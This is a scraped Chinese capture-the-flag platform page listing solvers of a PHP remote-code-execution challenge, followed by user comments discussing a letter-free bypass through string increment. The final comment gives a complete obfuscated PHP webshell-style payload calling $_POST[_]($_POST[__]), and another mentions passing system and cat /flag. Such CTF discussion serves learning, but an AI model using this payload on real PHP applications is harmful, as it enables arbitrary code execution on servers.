评分(3)
解题动态

hackerbugku 攻破了该题 3天前

dwx1583 攻破了该题 4天前

foolycat 攻破了该题 9天前

网络安全亮 攻破了该题 13天前

18940001335 攻破了该题 17天前

puppyo0o0 攻破了该题 18天前

124要留就要77 攻破了该题 19天前

yafoolaw 攻破了该题 20天前

bugkuctfmike6 攻破了该题 22天前

The-Beacon 攻破了该题 25天前

liuweiak007 攻破了该题 26天前

lindaxu 攻破了该题 28天前

wpc1027 攻破了该题 28天前

18259750065 攻破了该题 28天前

nihaolmb 攻破了该题 28天前

breeding 攻破了该题 29天前

Lmn13644482831 攻破了该题 29天前

soulchild 攻破了该题 1月前

orange33315 攻破了该题 1月前

评论
jiubanyipeng 1月前
举报
脚本参考:https://www.jiubanyipeng.com/1851.html
Jiafeng 6月前
举报
我去,属于知道思路,但是不敢实践的题目;(无数子字母RCE)
小丁小丁少发神经 8月前
举报
求问为啥设计成system和cat /flag用两个参数传,为什么不可以构造出$_POST[_]然后赋值_=system(cat /flag)呢(验证一下确实不行,但是不懂为啥)
shingu 3月前
举报
我也有个疑问。我花了好几个小时去研究,但也是一知半解。目前得到的答案是:`$$_[_]` 等价于 `${$_POST['_']}`,即用 `$_POST['_']` 的值作为变量名。如果使用`_=system(cat /flag)`,PHP会尝试访问名为 `$system('cat /flag')` 的变量,这显然非法,所以行不通。
不会写代码的菜鸟 11月前
举报
这道题完全不是我能做的,有答案也看不懂
modeng 1年前
举报
以下是我的思路与总结,希望对你有所帮助https://blog.csdn.net/m_de_g/article/details/138110100?spm=1001.2014.3001.5501
Jiafeng 6月前
举报
牛逼,可以直接造出N字符,那就好搞了;
hutiaan 1年前
举报
难,为了难而难
不懂就问 1年前
举报
参考:https://blog.csdn.net/qq_36292543/article/details/136623586
不会编程的崽 1年前
举报
自增绕过,最后的payload可以在burp里进行对特殊字符的url编码
xiaoxiao972521 1年前
举报
不做了,本地构建的脑瓜子刺挠,点跟蚊香去
Daniel2023 1年前
举报
$_=(_/_._)[_];$_++;$__=$_.$_++;$_++;$_++;$_++;$__=$__.$_;$_++;$__=$__.$_;$_=_.$__;$$_[_]($$_[__]);